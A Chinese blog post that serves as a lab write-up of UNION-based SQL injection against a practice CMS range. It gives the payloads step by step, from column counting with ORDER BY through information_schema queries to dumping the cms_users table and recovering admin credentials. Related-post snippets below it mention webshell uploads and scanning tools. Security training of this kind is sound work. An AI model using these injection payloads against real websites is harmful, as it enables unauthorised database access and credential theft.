cms靶场联合查询漏洞练习

最新推荐文章于 2024-08-04 23:03:55 发布
最新推荐文章于 2024-08-04 23:03:55 发布
阅读量620 收藏 3
点赞数 1
分类专栏: SQL_practice 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/have_a_great_day/article/details/132523114
版权

         通过数据库的内容会回显到页面。利用union select 语句,该语句会同时执行两条select语句,来实现跨库,跨表查询。

必要条件:

        1.两条select 语句查询结果具有相同的列数;

        2.对应的列数据类型一致。

2、目标分析:

进入cms靶场,随机进入一个新闻,发现网址结构如下所示

此时我们可以尝试去更改id 值,看页面内容是否发生改变。

结果发现页面发生了回显,暗示可能存在联合查询漏洞。

尝试判断该数据库的类型和闭合方式。

?id=32'

// near ''' at line 1;
// 中间的单引号是SQL 语句的内容;
// 32没有出现在报错信息中,说明是数字型注入。

3、SQL 注入流程

        库→表(tables)→列(columns)→数据。

        得到数据库的类型和闭合方式后。

4、判断列数:

id=32 order by 1  // 正常
id=32 order by 10 // 正常
id=32 order by 20 // 不正常
id=32 order by 16 // 不正常
id=32 order by 15 // 正常

// order by 数字 
// 通过多次尝试获取到select语句中有15列;

将所有列数进行输入,获取回显位置。

?id=-32 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15  // 第一种
?id=32 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 // 第二种

// 将第一条select 语句的查询条件置为假,

5、获取管理员账密:

获取数据库 库名称:

?id=-32 UNION SELECT 1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15

获取数据库 表名称:

一次性将所有表名
?id=-32 UNION SELECT 1,2,3,4,5,6,7,8,9,10,hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schema=database()

// group_concat 是针对查询结果进行聚合操作的 MySQL 函数。它用于将某个列的值连接成一个字符串,并返回聚合后的结果。
// hex() 将表名以16进制的格式进行输出,因为需要类型一致,所以选择16进制进行输出
//  information_schema数据库是MySQL自带的,该数据表保存了MySQL服务器所有数据库的信息。
// where table_schema=database() --- 表示所查询的表名属于当前数据库

对回显的16进制编码进行解码。

得到该数据库下所有表名:

cms_article,
cms_category,
cms_file,
cms_friendlink,
cms_message,
cms_notice,
cms_page,
cms_users 

查看cms_users表。

获取数据库 列名称:

一次性获取该表下所有列名:
?id=-32 UNION SELECT 1,2,3,4,5,6,7,8,9,10,hex(group_concat(column_name)),12,13,14,15 from information_schema.columns where table_schema=database() and table_name='cms_users'

对16进制编码进行解码:

获取到了username 和password

获取用户信息

?id=-32 UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users

// concat(str1, str2, ...)用于将多个字符串连接在一起,并返回连接后的结果。
// 0x3a 是[:] 的16进制代码。

对密码进行解码:

管理员账户:admin

管理员密码:123456

懒羊羊安全
关注
专栏目录
单机靶场练习
kdhoi的博客
11-21 424
目录实验靶场练习需要工具搭建环境实验信息实验要求靶场网址实验步骤 实验靶场练习 需要工具 VMWARE Workstation 15 Player 搭建环境 1.设置虚拟机的网卡为.NAT模式 2.调整物理机网卡vment8ip 为100网段 实验信息 ip地址为192.168.100.130 实验要求 在环境中找出3个flag 靶场网址 https://pan.baidu.com/s/1xd8M...
靶场实验练习笔记
hyy_ideal的博客
11-21 667
目录实验靶场练习笔记实验要求实验环境实验要求实验开始弱口令登陆网站后台文件上传漏洞进入内网导出导入 实验靶场练习笔记 实验要求 找出靶场中的5个flag 实验环境 靶机下载地址: ( 注:win2003为外网可访问机器,linux为内网机器 ) 配置环境: 设置win2003 网卡为nat ;物理机网卡Adapter for VMnet8设置为100网段 外网机器ip为192.168....
渗透靶机(CMS漏洞)
weixin_48876267的博客
10-21 3123
高难度渗透靶机 1、扫描靶机信息 nmap -sV 192.168.222.130 nmap -A -v -T4 192.168.222.130 nikto -host 192.168.222.130 //扫描网站目录 dirb http://192.168.222.130 //扫描关键信息 由于wordpress文件,判断是否是某个CMS,是否具有可以直接利用的漏洞; wpscan -url url -enumerate at -enumerate ap --enumer
常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)
最新发布
2301_76631050的博客
08-04 1100
利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\。猜测web路径: E:\phpstudy_pro\WWW。不要用\,如里要用\\(转义)
AtomCMS靶场
球球的博客
04-14 4079
AtomCMS建站软件,文件上传漏洞,xss漏洞
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
xinyue9966的博客
02-18 7893
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
510cms漏洞练习
weixin_56709770的博客
04-17 2335
510cms漏洞练习
各大CMS网站模板--练习web渗透必备.zip
12-11
各大CMS网站模板作为练习web渗透的靶场,为测试人员提供了实战演练的环境,让他们能够学习如何发现和利用CMS中的漏洞。 常见的CMS系统包括WordPress、Joomla、Drupal等,它们都有自己的特性和安全风险。例如,...
墨者靶场 中级:CMS系统漏洞分析溯源(第2题)
qq_43233085的博客
01-17 802
墨者靶场 中级:CMS系统漏洞分析溯源(第2题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地址及其他相关漏洞资料; 3、了解html源码的重要性。 解题方向 登录后台后执行linux系统命令,查看web源码。 解...
第六节 旅烨cms实战练习 -2021.03.11
lyx3429的博客
03-11 325
第六节 旅烨cms实战练习 -2021.03.11 前期使用win10里小皮搭建旅烨cms,以为自己的各项配置有问题,但是小皮能够正常带动DVWA,始终带动不了旅烨cms。 后来与其他安全人员交流,发现win7可以正常运行旅烨cms。 所以目前为何出现问题尚不清楚 1.环境搭建 win7+小皮 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nOSTEFUw-1615475228402)(C:\Users\LuXian\AppData\Roaming\Typora\typora
DC1靶场练习
qq_60848021的博客
04-08 442
大概意思就是查找passwd文件来找寻flag4文件,但是前面我们已经提权成功利用find命令找到了flag4文件,所以现在直接查看就行。思路:现在我们可以登录进来数据库,可以采用替换的方式,找到靶机的加密算法,将我们设定的密码转换成哈希密码,替换users表中的密码。已经查找到了用户名和密码,但是密码已经被加密了,采用的是哈希密码,破解难度比较大。搜索到drupal7的配置文件是settings.php ,查找该文件。开放端口:22,80,111,36890.三,漏洞利用(获取webshell)
EmpireCMS4.5 渗透测试及靶场搭建(漏洞复现)
Continuejww的博客
08-30 2376
成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞
靶场练习第六天~vulnhub靶场之Lampiao
qq_57976347的博客
01-31 879
一、信息收集 1.靶机发现 (1)靶机lampiao与kali均为NAT模式 ,Kali的 IP为192.168.101.10, 扫描网段用命令nmap -sp192.168.101.0/24,发现靶机ip为192.168.101.107 2.靶机具体信息 (1)使用命令nmap -A (进行综合扫描) 192.168.101.107 -p 0-65535 (看看靶机开放了什么端口)正在上传…重新上传取消 3.发现1898端口开放http协议, (1)查看该网站,发现是一个博客网站 (
红队笔记8-CTF5打靶流程-CMS漏洞-多用户信息泄露(vulnhub)
qq_63442530的博客
03-26 989
这次的靶场难度不高,但很需要经验,在提权过程中,把能有提权到尝试都去探索了一遍,发现都没有利用点,1.主机发现和端口扫描:端口扫描,发现存活了大量端口,其他很多端口不熟悉,依旧选择从80端口入手2.80端口:通过观察页面,发现是由NanoCMS搭建,存在后台登录窗口,根据想登录后台getshell的思路,寻找密码,最后在通过浏览器搜索到了NanoCMS的凭据泄露漏洞,成功登录后台。
大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-25 3947
数据与网络安全作为保障大数据系统正常运行的基石,同样备受关注。今天写博客时候发现自己很久没更新数据安全与网络安全方面的内容了,于是花了点时间写一篇CMS靶场实训博客。本文通过CMS靶场实训,深入分析CMS系统的安全漏洞,探讨防范措施,提供实战经验和攻防能力,有助于加强大数据与网络安全意识。
web渗透cms靶场
weixin_49794194的博客
01-10 746
主页测试了很多地方漏洞还是比较多的,可能是系统比较老的原因,但是我们的目标主要是文件上传拿下webshell,这里我们找到了会员注册 然后成功跳转会员中心,发现可以插入新的新闻,或者上传个人头像 这里首先哥斯拉的php后缀改为jpg,因为这个靶场是文件类型验证,burp抓传数据包 将第21行的filename jpg更改为php上传,上传之后f12查看网页源代码看看文件被插去哪里了 这里看到data有会员资料上传的php应该是上传之后重命名,我们直接打开哥斯拉连接 连接成功ipconfig,渗渗透靶场结束
CMS系统漏洞分析溯源(第6题)
tpaer的博客
11-03 725
靶场通关记录
【复现】常见CMS漏洞
m0_59151303的博客
08-04 724
点击【应用】–》【 插件安装】–》【 上传文件】点击【模板】--》【默认模板管理】--》【index.htm】--> 【修改】在文件修改中添加一句话木马…步骤一:点击【模块】–》【广告管理】--》【增加一个新广告】--》在【广告内容】处添加一句话代码–》点击【确定】步骤二:登陆到后台点击【核心】–》【文件式管理器】--》【文件上传】将准备好的一句话代码上传…步骤一:点击【工具】–》 【文件管理】–》 【功能菜单】 --》【上传文件】–》 【解压】
靶场日记2-----MetInfocms靶场
Zer0ooo的博客
11-26 2236
实验环境: 一个外网+两个内网 注:外网,可以访问到物理机,网卡为nat3; 物理机访问----->192.168.100.130 实验要求: 本环境共设置3个flag,在实验过程中不允许操作虚拟机。 步骤详解: 1.搭建环境,确保物理机ip为192.168.100.xxx网段。 2.物理机访问192.168.100.130,能够进入。并发现版本为MetInfo 5.0.4。 3.发现...
熊海cms的文件包含漏洞
07-29
关于熊海CMS的文件包含漏洞,我可以给你一些基本信息。文件包含漏洞是一种常见的安全漏洞,它允许攻击者通过包含恶意文件来执行任意代码或获取敏感信息。 针对熊海CMS的文件包含漏洞,你可以采取以下措施来缓解风险...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值